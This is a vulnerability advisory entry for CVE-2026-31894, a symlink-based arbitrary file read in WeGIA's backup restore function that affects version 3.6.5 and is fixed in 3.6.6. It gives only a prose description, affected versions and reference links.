Unrated severityNVD Advisory· Published Mar 11, 2026· Updated Mar 12, 2026

WeGIA affected by arbitrary file read via symlink in backup restore

CVE-2026-31894

Description

WeGIA is a web manager for charitable institutions. In 3.6.5, The patched loadBackupDB() extracts tar.gz archives to a temporary directory using PHP's PharData class, then uses glob() and file_get_contents() to read SQL files from the extracted contents. Neither the extraction nor the file reading validates whether archive members are symbolic links. This vulnerability is fixed in 3.6.6.

Affected products

LabRedesCefetRJ/Wegiav5
Range: >= 3.6.5, < 3.6.6

Patches

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

github.com/LabRedesCefetRJ/WeGIA/commit/79e7a164eddb527e3b331037b7a4defb8c115d50mitrex_refsource_MISC
github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6mmm-27h8-8g55mitrex_refsource_CONFIRM

News mentions

No linked articles in our index yet.

cvss	0.000
epss	0.000
exploit	0.000
kev	0.000
patch	0.000
ransomware	0.000